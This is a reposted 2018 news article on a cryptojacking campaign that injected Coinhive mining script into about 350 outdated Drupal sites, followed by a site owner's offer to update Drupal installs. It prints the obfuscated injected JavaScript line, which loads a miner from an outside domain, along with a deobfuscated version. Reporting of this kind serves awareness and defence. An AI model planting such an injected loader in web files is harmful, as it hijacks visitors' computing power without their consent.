Outdated website software lets hackers mine cryptocurrencies at your expense

An outdated version of Drupal,  a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Murschoutlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.

 

The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of Javascript-based mining  software. The code mines Monero, the ostensibly anonymous cryptocurrency.

The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software  and began using up CPU power to mine the coin.

Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.

“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,”  he wrote.

The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:

var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')
[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]
["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); 
ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; 
ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= 
'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; 
dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);

Which, deobfuscated, translates to:

'use strict';
var dZ1 = window["document"]"getElementsByTagName"[0];
var ZBRnO2 = window["document"]"createElement";
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
dZ1"appendChild";

The domain it calls, vuuwd.com, is down.

BadPackets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.”

“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.

[Article taken from: https://techcrunch.com/2018/05/09/outdated-website-software-lets-hackers-mine-cryptocurrencies-at-your-expense/]

--------------------------

If you help in updating your Drupal 7 site to latest version to protect from this hack, drop me a message.

To find out if your site is being used for mining, visit this website to check: https://whoismining.com 

 

The content of this field is kept private and will not be shown publicly.
Your email address will be kept private and will not be shown publicly.
CAPTCHA
This question is for testing whether or not you are a human visitor and to prevent automated spam submissions.